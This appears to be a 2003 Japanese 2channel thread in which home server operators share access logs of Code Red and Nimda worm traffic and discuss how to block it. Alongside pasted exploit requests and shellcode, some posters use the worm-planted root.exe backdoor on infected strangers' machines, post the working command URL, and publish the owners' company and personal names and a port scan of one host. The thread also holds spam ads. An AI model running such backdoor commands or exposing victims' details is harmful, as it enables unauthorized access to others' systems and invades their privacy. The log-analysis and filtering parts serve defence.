この鯖ワームにやられてます
当方やふーbbですが、 昨日Anhttpdで適当にweb鯖を立てて放置したところ いろいろ釣れました。 なんですかコリャ? 相手もやふーbbのようで。。 感染したワームが、一体何をしようとしているのだかよく分からんが xが延々と並んでいるのが、噂に聞くバッファオーバーフローってやつですか? 一日中こんなの送ってきて動作が重くなったりしないんだろか 219.144.82.204 - - [30/Apr/2003:20:23:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u 8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:45:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 211 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:01 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:02 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 って最初の219.144.82.204は中国の鯖っぽいな。 アクセスしようとしたら漢字だらけの404が返ってきた。 やふーbbの方はアホなユーザーがワームに感染していることも知らず 繋ぎっ放しにしているのかなぁ・・・ 感染していることすら判断できない、バカユーザがIISを立ち上げていることに疑問を感じるが。 つーか、>119は僅か100程のレスを遡って見る事もできんのか・・・ >>122 すんマソ。良く見たら 殆んど同じような報告がいくつも書かれていた…。 初心者なので変なのが飛んできたことが嬉しくて ついつい書いてしまったのでつた。 こう言うワームの類って、 鯖にセキュリティーホールが無ければ直接害は無いんだよね? しかし大量に飛んでくると ログ作成するのに負荷が掛かるってのがあるか… ルーターでワームだけをカットするような設定は、 簡単には出来るんかなぁ IP指定するのは当然出来るが こうあちこちから飛んでくると切りが無い。 だから、IP弾きは自動化できないって・・・ つーか動的IPや踏み台等を完全場合わけで簡単自動処理できるのがあるなら 教えてもらいたい・・・ なんも考えないでニムダやCodeRedを飛ばしてくるIPをブラックリストに入れると 困る可能性がある。 困ったときには、どこのブラックリストの一部が困ったのかわからないので ブラックリスト自体を消す羽目になる。 以上無理。 IPを弾くのではなく、ワームが送るヘッダーの特徴を検出して削除する ハードウェアルータがあったら良いのにな もちろん検出パターンはメーカーからの自動更新で。 >>118 219.180.88.36 のは日本だし、めちゃくちゃちゃねらーだな (藁 http://219.180.88.36/scripts/root.exe?/c+type+ "..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" >>127 > Windows 2000 Version: 5.0 > 現在のビルド: 2195 > Service Pack: None > 現在のタイプ: Uniprocessor Free > 登録されている会社名: (・∀・) > 登録されている所有者: (・∀・) 禿げ藁 常時接続のくせにServicePackも当てとらんとは、 もしや、ワレザーだったりしてな。 今頃Winnyでエロ画像落としてハァハァしてるんだろ MSNメッセンジャーとかIE、メモ帳位しか開いてないやん。 tptp.exeが大活躍していたりはするけどw 2ちゃんねらーにしては激しくツマンナイ椰子やね。 こういうのが糞スレ立てるんだろうな。 WHOISでみるかぎりコリアみたいですねー 210.95.90.50 - - [02/May/2003:12:57:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX これはチャイナ 210.72.239.240 - - [02/May/2003:09:53:08 +0900] "GET /default.ida?XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX とりあえず、今日だけの分でも素のIPを晒します。 211.153.19.148 211.180.229.213 211.114.27.16 211.249.78.151 211.116.251.18 上から順に新しい 全てCoderedに感染。しかも日本のIPかな?よく分からん。 って調べたら、前のとあわせて全部国はオーストラリアじゃん!! http://www13.big.or.jp/ ~fubuki/chat/chat2.html 荒らしてもただ見るだけでもOK。これからどんどんロム増えるから。 これと同じヤツをいろんなヤツにコピペしてね >>126 IDSを使うといいかも。個人向けにはトレンドマイクロから出ている。 NTTからFlet'sユーザー向けのOEM版も販売されている。ただ、 スループットが低いので、光ユーザーだと勿体無い。 http://www.trendmicro.com/jp/products/desktop/gatelock/evaluate/overview.htm >>127 >>128 >>129 不味くないか? >>127-129 通報しますた! と、言いたい所だが不正アクセス等を 相手は全く理解していない予感… 少なくともこれらのリクエスト送ってくるヤツらは MSのIISを立ち上げてる、と考えていいのですか? 202.125.153.14 61.187.64.194 202.39.15.237 202.131.151.20 202.194.196.67 これらはホスト名逆引きできないんですが、どういうことでしょうか。 ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。 >>138 > これらはホスト名逆引きできないんですが、どういうことでしょうか。 ISPが設定していないから。(.paknet.com.pk .twnic.net .estelcom.com .edu.cn .chinanet.cn.net) >>139 > ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。 赤帽と窓のデュアルブート環境だから。 赤帽と窓のデュアルブート環境だから。 意味が分からない、apacheが立ち上がってるのに なぜIISに感染するcode redが動いてるの? Linuxが動いてるはずなのに。 再接続でアドレスが変わったんじゃなーの? んで、たまたま新たに割り振られた先に赤帽&apacheがあったとか。 >>142 Win32版&IISだったとか(Linuxの根拠は。 >144 実際にアクセスしてみてヘッダを見てからの発言だろーな? >>146 ルータの下でポートフォワードで複数動かしてるとか。 ログの中にこんなの発見した 218.20.118.230 - - [09/May/2003:05:41:08 +0900] "GET http://www.21cn.net/ HTTP/1.1" 200 1529 何? というか、不毛にIIS動かしてるバカ多すぎ。 トラフィックの無駄遣いも甚だしい。 どうせ何のサービスかわかってないような輩だろ。 NT系、デフォルトでIISなんて入ってないはずなのに なんで動いてるんだ。取り敢えず腹が立つ。 202.196.110.208 - - [11/May/2003:00:01:29 +0900] "GET /default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 2973 "-" "-" http://202.196.110.208/ チョン国の中学校の鯖が感染しております。 なんてメールしたらいいかな「貴方感染。鯖PC code red」漢文わからん(T_T) >>128 のような情報を引っ張るにはどうしたらいいの? http://IP アドレス/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" ってリクエストすればいいの?404なったけど。 >貴方感染 もしかしたら、なんとなく程度だとしても意味が通じるかもしれない >鯖PC これは絶対無理(藁 >>150 英語で送っとけ 中国のエリートならペラペラだから そして、その中国のエリートが管理する鯖は穴だらけ。 >>148 http://www.21cn.net/ がそのIPアドレスにあると勘違い(?)して参照しようとしてきたリクエスト >>149 漏れW2Kでサービスをいじってたら、 知らぬ間にIISが動作していたよ・・・ ANHTTPD起動しようとしたが 80番ポートが開いてないエラーが出るので調べていたら発覚した そんな香具師が意外と多い予感 >貴方感染 我SARS否 とか、帰ってきそう(汗 >>149 >>157 そうなんですよね。 ウイルス対策も分からないやつが、標準で入らないIISを入れてしまっていることに やり場のない怒りと、やるせなさと… >>155 なるほど。 けどうちはttp://www.21cn.net/じゃないのになぜ200を返したんでしょうか? cmd.exe、root.exe、favicon.ico、default.ida等には404を返しているのに。 >>159 踏み台にして失敗したものです。 気になるようだったら、 SetEnvIf HOST FQDN allowed01 deny from env=!allowed01 にしとけば、403返すかと。 >>150 >貴方感染 チョン環境っていうより大陸向けのような気もします。 半島って標準で和文や簡体、繁体フォント入ってるのかなあ。 マジレスすると普通に Your environment is infected with the virus and it is troubled. Please carry out somehow. とかのほうが(文字コードだなんだ考えずに済んで)いいと思います。 >>160 あ、そうだったんですか。 うちが荒らされたりする分にゃ自分が我慢すれば済むけど、よそ様まで巻き込むのは不本意です。 教えていただいた「SetEnvIf HOST FQDN allowed01」を勉強のために検索してみました。 「Host:ヘッダーを指定しないリクエストを拒否する方法。」として、「ワームは、DNSの逆引きでもしない限り HostヘッダにFQDN名をセットできない、よってIPアドレス指定でアクセスしてきても、404 Object Not Foundエ ラーが返る。」とありましたので、httpd.confに設定してみました。 しばらくこれで様子を見てみます。ありがとうございました。 今月に入ってCodeRedが1日平均27個、先月あたりからだんだん増えてきているみたいです。 ネット上で見付けた「Code Red Check」というperl scriptと「dnstran」と「analog」使ってマメにログをチェ ックするぐらいしか出来ませんが、地道にやっていきます。 64.110.110.240 /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (略) XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ090ヨ190ヨ0c3ヨ003ヨb00ヨ31bヨ3ffヨ078ヨ000ヨ0=a ウガンダキタ━━━━━━(゚∀゚)━━━━━━━!!!!! 202.107.205.9 - - [15/May/2003:02:00:06 +0900] "\x05\x01" 501 - "-" "-" 最近多いのですが、このリクエストは何でしょうか?新手のワーム? 219.218.95.81 - - [15/May/2003:17:46:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 274 "-" "-" ワーム対策にバーチャルホストはどうよ HTTP_HOSTがない場合はダミーページの飛ばす ログをバーチャルホスト毎に記録すれば ワームのログは通常のログに混じらないが ━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━― 203.222.151.18 - - [23/May/2003:06:21:48 +0900] "GET (^^) HTTP/1.0" 404 1373 ∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉 初心者からの素朴な疑問 例えば、 c:/www/scripts/..チ/winnt/system32/cmd.exe にワームがアクセスしてくるとしますよね。 該当するディレクトリを作って、cmd.exeって名前のファイル(例えばフロッピーにアクセスし続けるファイルとか)置いといたらどうなるんでしょ? きのうの夕方に同一IPから5秒おきに20連発 "GET /NULL.IDA?CCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000 %u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000 %ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90 x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\ xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\ x90\x90\x90\x8b\xf7f\xb8H\x063 ... <以下略、とても長い> >>173 それうちにも来た。 そのあとなんか意味不明な文字があってしかもログが改行されちゃう。 何なのそれ? 久々にIRC繋いだら、こんなん帰ってきたのだが… irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272 ワームチェックかなんかでしょうか? http://yahoobb219055208068.bbtec.net/ バッチリ幹線してるようです。 [2ch@localhost 2ch]wget --spider http://yahoobb219055208068.bbtec.net/ 1 HTTP/1.1 200 OK 2 Server: Microsoft-IIS/5.0 3 Date: Fri, 13 Jun 2003 18:18:56 GMT 4 Connection: keep-alive 5 Connection: Keep-Alive 6 Content-Length: 1230 7 Content-Type: text/html 8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/ 9 Cache-control: private 200 OK どうやって警告したらいいでしょうか。 ftpとか開いてるし、アノニログインできるし(;´Д`) 厨房運営の鯖でしょうか。 Port State Service 7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open loc-srv 137/tcp filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp filtered netbios-ssn 443/tcp open https 445/tcp filtered microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 6699/tcp open napster いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな? htp://yahoobb219055208068.bbtec.net/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" アプリケーション例外が発生しました: アプリケーション: (pid=1020) 発生時間: 2003/05/01 @ 21:50:51.907 例外番号: c0000005 (アクセス違反) *----> システム情報 <----* コンピュータ名: VFGYARXITW27V4Y ユーザー名: Administrator プロセッサの数: 1 プロセッサの種類: x86 Family 6 Model 8 Stepping 6 Windows 2000 Version: 5.0 現在のビルド: 2195 Service Pack: None 現在のタイプ: Uniprocessor Free 登録されている会社名: 日本フレートライナー(株) 登録されている所有者: 山ア勝行 これはもう警鐘モンだぞ。 パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。 212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX(rya http://212.165.132.144/scripts/root.exe?/c+type+ "..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" Application exception occurred: App: (pid=1568) When: 6/2/2003 @ 02:07:38.527 Exception number: c0000005 (access violation) *----> System Information <----* Computer Name: CISCO-ACS User Name: Administrator Number of Processors: 1 Processor Type: x86 Family 6 Model 8 Stepping 10 Windows 2000 Version: 5.0 Current Build: 2195 Service Pack: None Current Type: Uniprocessor Free Registered Organization: prestel Registered Owner: okada okadaって日本人か? (´-`).。oO(不正にアクセスして個人情報開示してるバカだよなぁ・・・) 日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような ややグレーゾーンに近いがな。 インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。 わたしのホームページへアクセスした人は、不正アクセスでタイーホしてもらいます(w Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、 %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a は Code Green の物らしい。 ウイルスだった事には変わりは無いわけだが。 かぎの開いている家に侵入して情報ファイルを持ち出したら そいつは窃盗罪だろう。 不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を 公開したりしてなにか損害が起きればけっこう痛いことになるかもね 超過激ライブチャット登場!!!!! あなたの命令で若い娘たちがヌレヌレモードへ ☆★アメリカ西海岸発☆★モザイクなし☆★ あなたの言葉で・・・ヌードにさせてください あなたの指で・・・感じさせてください あなたの声で・・・イ・カ・セ・テ・ください 寂しがりやの留学生の若い娘がお待ちしております! ただいま、10分間無料で体験できるほか7日間会費無料!! http://www.gals-cafe.com 6月分のcodered。 01/Jun/2003 30 02/Jun/2003 37 03/Jun/2003 24 04/Jun/2003 31 05/Jun/2003 30 06/Jun/2003 24 07/Jun/2003 24 08/Jun/2003 27 09/Jun/2003 31 10/Jun/2003 38 11/Jun/2003 30 12/Jun/2003 37 13/Jun/2003 40 14/Jun/2003 20 15/Jun/2003 25 16/Jun/2003 33 17/Jun/2003 27 18/Jun/2003 22 19/Jun/2003 21 20/Jun/2003 28 21/Jun/2003 24 22/Jun/2003 22 23/Jun/2003 27 24/Jun/2003 34 25/Jun/2003 26 26/Jun/2003 32 27/Jun/2003 33 28/Jun/2003 32 29/Jun/2003 24 30/Jun/2003 16 これワーム関係?初めて見たんだけど それともアタック? 2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-" 2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-" 2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-" 2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-" 2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-" 2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-" 2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-" 2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-" 2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-" 2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-" 2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-" 2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-" 2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-" 2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-" 2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-" 2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-" 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-" 全67行 アクセスしようとしてるファイル名から推測すると IIS狙いのワームでないかい? うちにはまだお見えになられてないです >>194 > 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-" cgiwrapの設定不備狙ってる? IIS狙いとは言い切れない予感。 例の改ざん祭りの下準備かも((((((;゚Д゚))))))ガクガクブルブル __∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄ 孫さん家の人が衛生管理していないので、「出禁」にしています。 衛生管理出来る様になったら、タイム系サーバーを追加して 監視兵を置くかな・・・ そういえばどこかの検索エンジンのロボットはワームみたいな動きをしていくな。 最近、損さん家のf@t息子が猛烈アタックしてきます。 UDPの3010・3012・3013と投げてくるけど、これ何でしょ? ∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ >>205 なんで書き換えられちゃうわけ?あなたの会社のサイト ろくにパッチも当ててないDQN鯖官なのけ >>207 ごめん、動揺して説明たらずだった。 会社きて、自宅のHP見てみようとしたら、書き換えられてた。 自宅鯖はルータでHTTP、FTP,DNS,SSLのポートしか空けてねえです。 はぁ… >>208 なんか穴があるんだろうね いい機会だから徹底的にしらべましょう SSLとBINDがあやしいっすね。 最近会社忙しく自宅鯖放置気味だったからバチが当たったなー… なんていうか、自宅に帰る7時半まで手を出せないのがもどかしい… atfr064007013.do.ppp.infoweb.ne.jp - - [04/Aug/2003:01:02:25 +0900] "GET /defaul t.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190 %u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-" yahoobb219214144203.bbtec.net - - [04/Aug/2003:12:12:29 +0900] "GET /default.ida ?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c 3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-" この2ホスト、ここ1ヶ月ほど止まらない。 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・ そろそろISPのabuseにでも連絡すっかな。 >>212 > 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・ ・・・。 ウィルス、ワーム対策としてモデムとサーバの間にルータを噛ませてさらにサーバ、 クライアントにはウィルス対策ソフトをインストールする程度ではまだ足りないでしょうか? もちろんウィンドウのアップデート、パッチは最新のものをなるべく早く当てるようにします。 >>214 根本的にだめ。 ウイルス、ワーム、セキュリティについてのポリシーを 自分で確立すべし 俺の自宅サーバーにおけるセキュリティについての考え方のひとつに 「稼動時間を減らす」てのあるけど誰も賛同してくれん。 「馬鹿じゃねぇ?」「使えねぇ!」の連呼 うるせー馬鹿! >>216 いや、科学技術庁も導入したぐらいだし(藁 稼働時間を減らしたところで、穴をあけっぱなしにしていれば頻繁にやってくるワームにやられるので 結局常時稼働とさほど変わらないんでないの? セキュリティで最も重要なのは、穴をあけない、見つかったらすぐにふさぐという基本的な事項をしっかり行うこと。 うちは、CodeRedが30〜40件/日、ほとんどが韓国と中国 それから、Nimdaも30〜40連続アタック [error][client 61.213.32.47] 千葉のCATV局だ。もー頼むよ・・・。 うちも先月までは>>219 とほぼ同量のアタックがあったんだが、 1週間程度、接続元IPが韓国・中国・台湾のパケットを総蹴りにしたら 解除した後もなぜかアタックが以前より減少してる どれくらい来てるのかな?とオモテ2002年10月以降のログを一括検索したら4609件出てきた。 ヽ(`Д´)ノウワァァァン Nimdaの時に比べたらかなり平和だよな。 あのときはピーク時で1分間に2〜3回アクセスが続いたし。 帰省中だったので放置しているうちにログが肥大化して帰ってきたらfile system fullでかなり焦った。 (⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン パケット通信危うし・・・ 納入先監視装置、今月は1万円を越えました×n台 この先どうなることやら・・・ yahoobb219178230052.bbtec.net [10/Sep/2003:00:47:47 +0900] "GET / HTTP/1.1" "-" デザインが変... もう ahooBB 大迷惑。パッチ宛ててるのかどうか知らんけど。 当ててたとしたら、肝心の駆除してねぇヤツ多すぎ。 全部 bbtec.net 遮断に決定。俺は困らねぇし。 UDP LOOPアタックくらいまくりなんですがどうしたらいいですか? 特定の相手難ですが。 2003/09/21(23:14:55) W-SV 218.188.110.35 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:01) W-SV 218.188.110.35 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:06) W-SV 218.188.110.35 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:12) W-SV 218.188.110.35 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" パッチ当ててない鯖って周りにも迷惑かけて最悪だな ahooBBキター 2003/09/22(00:25:32) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" IPアドレスを変えてSEARCHをかけて来てます、どうしたらいいでしょうか? これずっとやられて、アクセス数がどんどん増えて行ってしまいます。 同時接続数が限られる環境でこの攻撃は痛いです。 だれか辞めさせる手段をご教授お願いします。 2003-09-22 11:56:38 140.112.88.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 11:58:03 67.128.66.123 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 11:58:04 67.128.66.123 - "" SEARCH / - 411 - 2003-09-22 12:07:06 12.168.146.99 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:07:06 12.168.146.99 - "" SEARCH / - 411 - 2003-09-22 12:10:31 62.254.0.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:10:31 62.254.0.18 - "" SEARCH / - 411 - 2003-09-22 12:12:38 202.64.33.192 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:12:38 202.64.27.183 - "" SEARCH / - 411 - 2003-09-22 12:13:48 81.152.119.97 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:13:48 81.152.119.97 - "" SEARCH / - 411 - 2003-09-22 12:18:41 80.222.212.13 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:18:42 80.222.212.13 - "" SEARCH / - 411 - 2003-09-22 12:19:39 194.100.73.249 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:19:39 194.100.73.249 - "" SEARCH / - 411 - 2003-09-22 12:22:34 219.0.96.166 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:22:34 219.0.96.166 - "" SEARCH / - 411 - 2003-09-22 12:31:35 81.106.226.196 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:31:36 81.106.226.196 - "" SEARCH / - 411 - 2003-09-22 12:33:22 220.36.28.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:33:22 220.36.28.75 - "" SEARCH / - 411 - 2003-09-22 12:39:38 68.75.21.33 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:39:38 68.75.21.33 - "" SEARCH / - 411 - 2003-09-22 12:49:59 4.65.242.242 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:49:59 4.65.242.242 - "" SEARCH / - 411 - 2003-09-22 12:50:56 61.242.82.156 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:50:56 61.242.82.156 - "" SEARCH / - 411 - 2003-09-22 12:52:25 68.122.155.202 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:52:25 68.122.155.202 - "" SEARCH / - 411 - 2003-09-22 12:52:55 63.196.240.140 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:52:57 63.196.240.140 - "" SEARCH / - 411 - 2003-09-22 12:57:34 67.115.71.91 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 